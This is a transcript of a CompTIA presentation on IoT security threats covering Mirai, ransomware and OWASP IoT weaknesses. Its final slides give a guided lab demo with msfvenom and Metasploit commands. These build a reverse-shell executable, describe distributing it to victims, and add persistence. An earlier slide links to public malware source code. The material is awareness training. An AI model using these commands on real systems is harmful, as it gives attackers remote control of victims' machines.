Protecting your Organisation from the Internet of Evil Things

Copyright (c) 2017 CompTIA Properties, LLC. All Rights Reserved. | CompTIA.org

The Voice of the World’s IT Industry and over 1.5 million IT Professionals

✓ Higher Salaries✓ Growing Demand✓ Verified Strengths✓ Universal Skills

“Three of the ‘Top 10 Certifications That Help IT

Workers Get Jobs’ are CompTIA certifications.”*

CERTIFICATIONS

Largest Provider of Vendor-Neutral IT Certifications

A non-profit trade association with

more than 4,000 members and

business partners. Our members

drive our programs through their

participation in CompTIA

communities, research studies,

events, sharing of best practices and

more.

ASSOCIATION

4,000+ IT Channel Providers & Partners

A 501(c)(3) charitable organization

that creates on-ramps for successful

IT careers, serving individuals who

are underrepresented in IT and

lacking in opportunities to be

successful in IT, including veterans,

youth, and the unemployed.

PHILANTHROPY

Creating IT Futures Foundation

Our advocacy division encourages

collaboration and advancing of

legislation that allows the private

sector to develop new products and

services, find solutions and sell

them in the global marketplace.

ADVOCACY

Public Policy & Reform

* Source: The Dice Report, February 2012


Zeshan SattarFrom Cybernetics to Cybersecurity

3

2004

• BSc Cybernetics & Virtual Worlds

• IT Support Tech, UK & Japan

2007

• Systems Administrator

• Technical Trainer, Europe

2013

• IT Expert Consultant, Worldwide

• Head of Curriculum

2015• Certification Evangelist


Agenda

▪ Introduction

▪ What is IoT?

▪ What is IoET?

▪ Examples of Cyber attacks

▪ Human error

▪ CompTIA certifications

▪ Guided Demo : Compromising a Windows client

4


What is the Internet of Things?

The Internet of things (IoT) is the inter-networking of physical devices, vehicles (also referred to as "connected devices" and "smart devices”)

Which simply means…

6


Everything Has Become Connected

7

Smart Car

Smart Suit Smart House Tablet

Smart Phone

Desktop/Laptop

Smart Shoes

Internet CCTV

Smart Watch

Smart CitiesThe Internet


What is the Internet of Things?

▪ The main problem is that because the idea of networking appliances and

other objects is relatively new, security has not always been considered in

product design.

▪ Consumers often fail to change the default passwords on smart devices or if

they do change them, fail to select sufficiently strong passwords.

8


The Concerns▪ 70% of the most commonly used IoT devices contain vulnerabilities involving password security,

permissions and encryption

▪ A number of IoT devices available today have defaulted to the lowest hanging fruit for security & authentication: passwords. Passwords are bad and a disaster for the web & IoT, for many reasons.

▪Application-level security:

–Default admin passwords

–Weak passwords

–Not using encryption over the network

–Open ports.

▪Protocol-level security:

–Wireless protocols such as ZigBee & Bluetooth

10


The Internet of Evil Things

11


What is the Internet of Evil Things?

▪ It is the Internet of Things but used in a negative way to hurt you.

▪ By detecting vulnerabilities, they can control your:

– Car, house, phone, computer

– Your identity can be stolen, You can be killed, You can be blackmailed

– You can end up in jail because of an attack that took place while you were

asleep

13


Examples of IoT devices

14


The accessible IoT devices

15


The Problems?

▪ Limited CPU on devices

▪ Encryption & identity keys

▪ New devices with new OS/software

▪ Too much network traffic

▪ Wi-Fi connected home appliances

▪ GUI & Internet Browsers

▪ Hardware Trojans

16


Cyber Attack Examples

17


What is Mirai?

▪ Mirai is the Japanese word for Future.

▪ In IT, it is a Malware that attacks out-of-date Linux devices remotely

▪ It controls the devices and turn them into a botnet for further attacks

▪ It scans the internet looking for IP addresses of IoT devices.

▪ Some of the popular website affected were: GitHub, Twitter, Reddit,Netflix, Airbnb

▪ BASHLITE is another malware that performs a DDoS Attack on LinuxSystems

19


More about Mirai

▪ On the 21st of October 2016. Mirai-fueled zombie botnet army wasdeployed on Dyn.

▪ Dyn is one of the world’s largest DNS providers

▪ The attack resulted in taking down internet access in many of America’slargest cities.

▪ Mirai gave us a view on how the IoT can turn into an IoET by controllingmany devices and maybe shutting them down

20


Mirai – one year on…

▪ 66% of IT Pros said they either haven’t checked or don’t know how to check their devices for Mirai

▪ 20% said their IoT devices were hit with ransomware attacks last year.

▪ 16% of respondents say they experienced man-in-the-middle attacks through IoT devices.

▪ 23% of IT security professionals monitor connected devices coming into their offices

22

Source: Pwnie Express


The Onion Routing (TOR)

▪ Onion routing is a technique for anonymous communication over a

computer network. In an onion network, messages are encapsulated in

layers of encryption, analogous to layers of an onion. ... When the final layer

is decrypted, the message arrives at its destination.

▪ Tor aims to conceal its users' identities and their online activity from

surveillance and traffic analysis by separating identification and routing.

▪ It is an implementation of onion routing, which encrypts and then randomly

bounces communications through a network of relays run by volunteers

around the globe

23


Ransomware


Steps to Ransomware

25

Infected file or Email link to a page User redirected to Site File Downloaded to the system

File InstalledUser Data EncryptedPay or Pay


WannaCry▪ WannaCry Ransomware

▪ One of the worst spread malware

▪ Developed by the NSA “Eternal Blue”

▪ Supposedly weaponized by North Korea

▪ This Ransomware is still spreading

26


Top 10 IoT Vulnerabilities

1. Insecure Web Interface

2. Insufficient Authentication/Authorization

3. Insecure Network Services

4. Lack of Transport Encryption/Integrity Verification

5. Privacy Concerns

6. Insecure Cloud Interface

7. Insecure Mobile Interface

8. Insufficient Security Configurability

9. Insecure Software/Firmware

10. Poor Physical Security

27

Source: OWASP


Shodan.io

28


Some Dangerous Apps

29

▪ Flashlight

▪ Tinder

▪ Snapchat

▪ Blendr

▪ Whisper

▪ Yik Yak

▪ Poof

▪ Omegle

▪ Clean it

▪ Deep Clean

▪ Flappy Cat

▪ Light VPN

▪ DU battery Saver & Fast Charge

www

▪ Lazy Listen audiobook

▪ Kik Messenger

▪ Whatsapp Bomber

▪ Quick Pic

▪ ES File Explorer

▪ UC Browser

▪ Dolphin Web Browser

▪ Clean Master

▪ Whale Camera

▪ Blinking Camera

▪ File Master

▪ Art Camera


Sample Malware / Virus Codes available on GitHub(for Research)

30

RansomwareCode

WormCode

VirusCode

MiraiSlice Code

Batch File Code

DoSCode

https://github.com/graniet/fsociety-ransomware-MrRobot/tree/master/source

https://github.com/rummykhan/viruses

https://github.com/Visgean/Zeus

https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/tools/single_load.c

https://null-byte.wonderhowto.com/how-to/hack-like-elite-batch-scripting-for-malicious-purposes-part-1-the-basics-0162011/

https://github.com/Souhardya/WarChild


How would a HACKER use IoT against you?

31


Hacking Steps

32

Covering Tracks

Maintaining Access

Gaining Access

Scanning

Reconnaissance

To protect against a hacker, you have to think like a hacker


How would a HACKER use IoT against you?

▪ Blackmail

– What Happened?

▪ Identity Theft / 419 Scam

– Why do they need it?

▪ Phishing

– What info are they looking for?

▪ Health Reports

– What do they do with it?

33


Quick Tip

34


The Solutions?

▪ IoT Security means opens new gates for security professionals to develop security

solutions

▪ Network Security:

– How many devices transfer unencrypted data?

– What are these devices?

– Which are most active?

▪ User Security:

– Do you need that software?

– Is it trustable?

– Is it from the vendor?

35


IoT attacks in different sectors

20.5 20

10.2

20

40.5 40.4

20.8

60

80

60 60

90.3

0

10

20

30

40

50

60

70

80

90

100

Consumer Commercial Medical Security Issues

IoT

2010 2015 2020

38

Billions


Top 5 Reasons for IoT attacks

40

1 Low security awareness

2 Weak Password Security

3 Careless handling of data

4 Inadequate software security

5 Ineffective data access management


End User awareness is critical

41


Ensuring our IT Professionals are equipped with the right skills


• A+, Network+, Security+, Linux+, CSA+DoS

• A+, Network+, Linux+, Security+, CASPAndroid

• A+, Network+, Server+, Security+, Linux+SQL Injection

• Network+, Security+, CASP, Linux+Wi-Fi

• A+, Network+, Security+, CSA+, CASP, Linux+Virus Attacks


Guided Demo of an Attack

▪ How can you simulate this at home?– Virtualization Software (Hyper-V, VMWare Player, Virtual Box)

– Kali Linux

– Windows client

– Tip: set up a Windows Server VM to provide DHCP to the virtual network and use an isolated VM network

The attack performed here is for Demonstration, Awareness and Educational purposes. Performing the same is at your own Risk.


Commands to the demo (1/3)

▪ On the Kali Linux VM, open a terminal window and type the following command:

msfvenom -p windows/meterpreter/reverse_tcp

LHOST=192.168.2.10 LPORT=4444 -f exe > exploit.exe

▪ This command creates the exploit.exe and stores it in the Home folder ready for you to distribute to the victims (USB, email, web link etc.)

▪ The IP address is of your Kali VM

▪ Then launch Metasploit by typing the following command:

msfconsole

45



▪ Now, we will configure the Kali VM to listen for the user to launch the exploit, by typing:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.2.10

set LPORT 4444

exploit -j –z

▪ Your Kali VM is now ready for the attack to happen. On your Windows client, double click the exploit.exe

▪ You will notice that the Kali VM receives the connection46



▪ We can now interact with the connecting machine by typing:

sessions -i 1

▪ We want to ensure that if the user logs off/restarts the machine, we can reconnect. This can be done by adding persistence:

run persistence -U -i 5 p 4444 r 192.168.2.10

▪ We now have full control of the system and can carry out various commands. The commands that you can use, can be viewed by typing:

Help

▪ Enjoy hacking!

47

Any Questions?


Thank you for your time!

Zeshan SattarLet’s connect!Twitter: @zeshandotcomLinkedIn: https://www.linkedin.com/in/zeshandotcom/

49

https://www.linkedin.com/in/zeshandotcom/

Protecting your Organisation from the Internet of Evil Things

Technology

Transcript of Protecting your Organisation from the Internet of Evil Things